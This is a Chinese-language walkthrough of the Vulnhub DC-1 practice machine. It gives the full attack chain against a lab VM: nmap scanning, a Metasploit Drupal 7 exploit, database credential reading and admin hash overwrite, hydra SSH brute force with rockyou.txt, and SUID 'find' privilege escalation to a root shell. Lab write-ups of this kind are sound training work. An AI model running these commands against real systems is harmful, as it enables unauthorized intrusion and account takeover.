Vulnhub靶场-DC-1靶机练习

Vulnhub-DC-1

daoyuan
## 零、环境配置

​ 1、虚拟机:vmware 15.5.6

​ 2、攻击环境:kali linux 2020.3 192.168.143.128

​ 3、靶机:DC-1

​ 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。
Vulnhub靶场-DC-1靶机练习_第1张图片

一、攻击过程

一、主机存活扫描

arp-scan -l
探测到目标ip:192.168.143.134

Vulnhub靶场-DC-1靶机练习_第2张图片

二、端口扫描

namp -A -p- 192.168.143.134
扫描到以下端口以及服务
22端口——ssh服务
80端口——http服务

三、漏洞探测

Vulnhub靶场-DC-1靶机练习_第3张图片

nmap --script=vuln 192.168.143.134
探测到Drupal 7 版本存在漏洞

Vulnhub靶场-DC-1靶机练习_第4张图片

四、漏洞攻击

msfconsole
打开msfconsole

Vulnhub靶场-DC-1靶机练习_第5张图片

search drupal 7
搜索drupal 7 漏洞,显示有最新的2018版,而且效果很棒。

Vulnhub靶场-DC-1靶机练习_第6张图片

use 4(定位到攻击载荷4)
set rhosts 192.168.143.134(设定靶机IP)
exploit(开始攻击)

Vulnhub靶场-DC-1靶机练习_第7张图片

shell             
#(得到shell)
python -c "import pty;pty.spawn('/bin/bash')"
#(Python 交互shell脚本,数据库只允许本地连接,我们需要一个shell)
ls -al
(查看所有文件可以看到有flag1)

Vulnhub靶场-DC-1靶机练习_第8张图片

cat flag1.txt
打开flag1.txt 得到提示CMS配置文件的提示,百度drupal配置文件信息

在这里插入图片描述
Vulnhub靶场-DC-1靶机练习_第9张图片

cat sites/default/settings.php
打开配置文件得到flag2
提示爆破与字典不是唯一的方法,同时给出了数据库的相关信息。

Vulnhub靶场-DC-1靶机练习_第10张图片
Vulnhub靶场-DC-1靶机练习_第11张图片

mysql -u dbuser -p #(登入数据库。输入密码)
show databases;#(显示所有数据库名)
use drupaldb#(定位drupaldb数据库)
show tables;#(显示当前数据库的所有表)

Vulnhub靶场-DC-1靶机练习_第12张图片
Vulnhub靶场-DC-1靶机练习_第13张图片
Vulnhub靶场-DC-1靶机练习_第14张图片

探测到有用的表——>users
select * from users;
查看users表内容,发现用户名admin,但密码是一段hash值,难以破解。这里直接替换掉它

Vulnhub靶场-DC-1靶机练习_第15张图片

cd ..
./scripts/password-hash.sh daoyuan
用script脚本生成daoyuan的hash密码

Vulnhub靶场-DC-1靶机练习_第16张图片

update users set pass="$S$DxFoVcv5JJYjcK/pu4PLBq74qKW/ZCQKFMYcsSPadKFI9ms9K.gR" where uid=1;
用新密码生成的hash值覆盖原有密码

在这里插入图片描述
登入网页发现flag3,提示passwd,联想passwd文件
Vulnhub靶场-DC-1靶机练习_第17张图片
Vulnhub靶场-DC-1靶机练习_第18张图片

cat etc/passwd
打开passwd文件发现有账户flag4,之前端口扫描发现22端口已经开启
这里用ssh远程登入,但不知道密码

Vulnhub靶场-DC-1靶机练习_第19张图片

尝试用hydra爆破一下
字典用自带的rockyou.txt
进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压:

gzip -d rockyou.txt.gz
复制txt到root目录下

hydra -l flag4 -P rockyou.txt 192.168.143.134 ssh
得到密码orange,可以ssh远程登入了

Vulnhub靶场-DC-1靶机练习_第20张图片

ssh flag4@192.168.143.134 -p 22
密码orange

Vulnhub靶场-DC-1靶机练习_第21张图片

得到flag4 ,提示root,我们这里是www用户,权限很低,root就是暗示提权
Vulnhub靶场-DC-1靶机练习_第22张图片

find / -type f -perm -u=s 2>/dev/null
查找靶机可执行的二进制文件,找到了find的suid权限.

Vulnhub靶场-DC-1靶机练习_第23张图片

	touch 1
	find 1 -exec "/bin/sh" \;
	cd /root
	cat thefinalflag.txt
	find提权,得到最后的flag

Vulnhub靶场-DC-1靶机练习_第24张图片

至此,5个flag已经全部找出!

如有错误,烦请不吝赐教。
转载请注明出处!

你可能感兴趣的:(DC靶机)